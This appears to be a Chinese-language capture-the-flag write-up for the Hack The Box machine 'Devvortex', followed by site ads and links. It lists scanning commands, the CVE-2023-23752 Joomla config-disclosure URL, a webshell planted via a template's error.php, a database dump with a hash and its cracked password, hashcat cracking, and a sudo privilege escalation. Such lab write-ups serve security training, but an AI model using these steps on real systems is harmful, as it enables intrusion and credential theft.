【HTB】 Devvortex 红队 easy
1、端口扫描
2、网页检测
发现一个表单,查看源代码发现是假表单
可能发现一个自定义域名
3、子域名扫描
gobuster vhost -w=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://devvortex.htb/ --append-domain --no-error
4、目录扫描
可以得到一个 adminstrator
gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://dev.devvortex.htb/ --no-error
扫描 adminstrator
没啥收获
5、页面登录
1)访问
http://dev.devvortex.htb/administrator/
2)查看网站信息
访问下列网址(CVE-2023-23752)
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
获取到账号密码
6、页面检测
获取源代码
7、验证
经过验证,error.php 可用
访问
http://dev.devvortex.htb/templates/cassiopeia/error.php
8、利用
监听端口
写入 shell
访问
http://dev.devvortex.htb/templates/cassiopeia/error.php
9、获取 user.txt
1)查看信息
查看用户
ls /home
查看路径
pwd
查看文件
2)查看配置文件
连接数据库
mysql -u lewis -p
3)查看数据库
show databases;
use joomla;
show tables;
select * from sd4fg_users;
将获取的密码保存至本地
echo '$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12:tequieromucho' > pass.txt
4)hash破解
hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt
hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show
5)ssh 连接
6)获取 user.txt
cat /home/logan/user.txt
10、获取 root.txt
1)查看 bash 权限
2)利用 sudo 提权
需要连接 pid,连接中将 pid 中断,然后获取 root 权限
a. 手动弄个 pid
b. 连接
c. kill pid
d. 获取权限
3)获取 root.txt
!cat /root/root.txt
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通